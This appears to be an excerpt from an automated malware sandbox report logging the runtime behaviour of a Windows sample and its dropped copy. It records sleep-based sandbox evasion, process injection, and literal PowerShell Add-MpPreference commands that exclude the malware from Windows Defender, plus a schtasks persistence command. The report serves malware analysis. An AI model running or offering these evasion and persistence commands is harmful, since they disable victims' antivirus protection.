                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exe TID: 5676Thread sleep time: -44034s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exe TID: 3600Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exe TID: 4548Thread sleep count: 1858 > 30
                  Source: C:\Users\user\Desktop\TTRef06022301.exe TID: 4388Thread sleep time: -3689348814741908s >= -30000s
                  Source: C:\Users\user\Desktop\TTRef06022301.exe TID: 4388Thread sleep time: -100000s >= -30000s
                  Source: C:\Users\user\Desktop\TTRef06022301.exe TID: 4388Thread sleep time: -99859s >= -30000s
                  Source: C:\Users\user\Desktop\TTRef06022301.exe TID: 4388Thread sleep time: -99746s >= -30000s
                  Source: C:\Users\user\Desktop\TTRef06022301.exe TID: 4388Thread sleep time: -99631s >= -30000s
                  Source: C:\Users\user\Desktop\TTRef06022301.exe TID: 4388Thread sleep time: -99515s >= -30000s
                  Source: C:\Users\user\Desktop\TTRef06022301.exe TID: 4388Thread sleep time: -99406s >= -30000s
                  Source: C:\Users\user\Desktop\TTRef06022301.exe TID: 4388Thread sleep time: -99248s >= -30000s
                  Source: C:\Users\user\Desktop\TTRef06022301.exe TID: 4388Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exe TID: 1504Thread sleep count: 911 > 30
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exe TID: 4400Thread sleep time: -2767011611056431s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exe TID: 4400Thread sleep time: -100000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exe TID: 4400Thread sleep time: -99843s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exe TID: 4400Thread sleep time: -99733s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exe TID: 4400Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\TTRef06022301.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\Desktop\TTRef06022301.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9565Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9313Jump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeWindow / User API: threadDelayed 1858
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeWindow / User API: threadDelayed 911
                  Source: C:\Users\user\Desktop\TTRef06022301.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\Desktop\TTRef06022301.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeThread delayed: delay time: 44034Jump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeThread delayed: delay time: 44034Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\Desktop\TTRef06022301.exeThread delayed: delay time: 100000
                  Source: C:\Users\user\Desktop\TTRef06022301.exeThread delayed: delay time: 99859
                  Source: C:\Users\user\Desktop\TTRef06022301.exeThread delayed: delay time: 99746
                  Source: C:\Users\user\Desktop\TTRef06022301.exeThread delayed: delay time: 99631
                  Source: C:\Users\user\Desktop\TTRef06022301.exeThread delayed: delay time: 99515
                  Source: C:\Users\user\Desktop\TTRef06022301.exeThread delayed: delay time: 99406
                  Source: C:\Users\user\Desktop\TTRef06022301.exeThread delayed: delay time: 99248
                  Source: C:\Users\user\Desktop\TTRef06022301.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeThread delayed: delay time: 100000
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeThread delayed: delay time: 99843
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeThread delayed: delay time: 99733
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeThread delayed: delay time: 922337203685477
                  Source: TTRef06022301.exe, 00000008.00000003.282832205.0000000001062000.00000004.00000020.00020000.00000000.sdmp, iJyzakGsXF.exe, 00000014.00000003.336831683.0000000001226000.00000004.00000020.00020000.00000000.sdmp, iJyzakGsXF.exe, 00000014.00000002.501452553.000000000123A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess token adjusted: Debug
                  Source: C:\Users\user\Desktop\TTRef06022301.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Injects a PE file into a foreign processes
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeMemory written: C:\Users\user\AppData\Roaming\iJyzakGsXF.exe base: 400000 value starts with: 4D5AJump to behavior
                  Adds a directory exclusion to Windows Defender
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TTRef06022301.exe
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\iJyzakGsXF.exe
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TTRef06022301.exeJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\iJyzakGsXF.exeJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TTRef06022301.exeJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\iJyzakGsXF.exeJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iJyzakGsXF" /XML "C:\Users\user\AppData\Local\Temp\tmp685E.tmpJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess created: C:\Users\user\Desktop\TTRef06022301.exe C:\Users\user\Desktop\TTRef06022301.exeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iJyzakGsXF" /XML "C:\Users\user\AppData\Local\Temp\tmpC6BA.tmpJump to behavior
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess created: C:\Users\user\AppData\Roaming\iJyzakGsXF.exe C:\Users\user\AppData\Roaming\iJyzakGsXF.exeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess created: C:\Users\user\AppData\Roaming\iJyzakGsXF.exe C:\Users\user\AppData\Roaming\iJyzakGsXF.exeJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Users\user\Desktop\TTRef06022301.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
